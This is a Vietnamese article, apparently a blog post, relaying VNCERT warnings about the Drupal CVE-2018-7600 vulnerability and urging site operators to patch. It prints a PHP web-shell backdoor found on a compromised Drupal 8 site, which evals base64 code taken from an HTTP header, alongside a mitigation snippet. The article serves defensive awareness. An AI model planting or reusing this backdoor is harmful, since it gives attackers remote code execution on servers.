CVE-2018-7600 vulnerability lỗ hổng an toàn thông tin năm 2018

Trung tâm Ứng cứu khẩn cấp máy tính Việt Nam (VNCERT) đã liên tiếp có văn bản khẩn trong hai ngày 23 và 24-4 để cảnh báo lỗ hổng an toàn thông tin hệ thống quản trị nội dung của các trang, cổng thông tin điện tử.

Theo VNCERT, hệ thống quản trị nội dung Drupal là một trong những hệ thống quản trị nội dung đang được sử dụng khá phổ biến để xây dựng các trang, cổng thông tin điện tử, ứng dụng website tại Việt Nam.

Tuy nhiên, từ cuối tháng 3 đến nay, hệ thống Drupal đã bộc lộ 2 lỗ hổng bảo mật có mức độ nguy hiểm cao đến nghiêm trọng cần được theo dõi xử lý khẩn cấp.

CVE-2018-7600 vulnerability

VNCERT cho biết có thực tế cán bộ kỹ thuật chủ chốt đang vận hành các cổng, trang thông tin điện tử tại Việt Nam không biết cổng, trang được phát triển trên nền tảng Drupal nên chủ quan, bỏ qua lỗ hổng an toàn thông tin, có thể dẫn tới việc bị tấn công.

Mã độc được tìm thấy trên site Drupal 8 của mình

Array<?php if(@isset($_SERVER[HTTP_BCCCB]))
{@eval(base64_decode($_SERVER[HTTP_BCCCB]));}exit;?>
<span class="ajax-new-content"></span>
libasset.phpArrayArraylibasset.php

Mã độc được tìm thấy trên site Drupal 7 của mình


#fix for CVE-2018-7600 vulnerability
$_GET = @CVEFIX($_GET);
$_POST = @CVEFIX($_POST);
$_COOKIE = @CVEFIX($_COOKIE);
$_REQUEST = @CVEFIX($_REQUEST);

function CVEFIX($input) {
    foreach ($input as $key => $value) {
        if ($key !== '' && $key[0] === '#') { unset($input[$key]); }
        else { $input[$key] = @CVEFIX($input[$key]); }
    }
    return $input;
}

Trong trường hợp tin tặc khai thác thành công lỗ hổng an toàn thông tin nói trên, tin tặc sẽ tải tệp tin mã độc lên máy chủ và sử dụng như một bàn đạp thực hiện tấn công từ chối dịch vụ phân tán hoặc sử dụng tài nguyên của máy chủ để thực hiện hành vi đào tiền ảo trái phép.

Ngoài ra, nhiều nguy cơ khác cũng sẽ xảy ra nếu không có sự xử lý kịp thời.

Do đó, VNCERT đã khuyến cáo các đơn vị có trang, cổng thông tin điện tử sử dụng hệ thống Drupal cần nhanh chóng cập nhật bản vá lỗ hổng và liên hệ với VNCERT nếu cần hỗ trợ kỹ thuật.

Tags: 
CMS Drupal
Drupal Block
Bạn thấy bài viết này như thế nào?: 
Average: 7 (7 votes)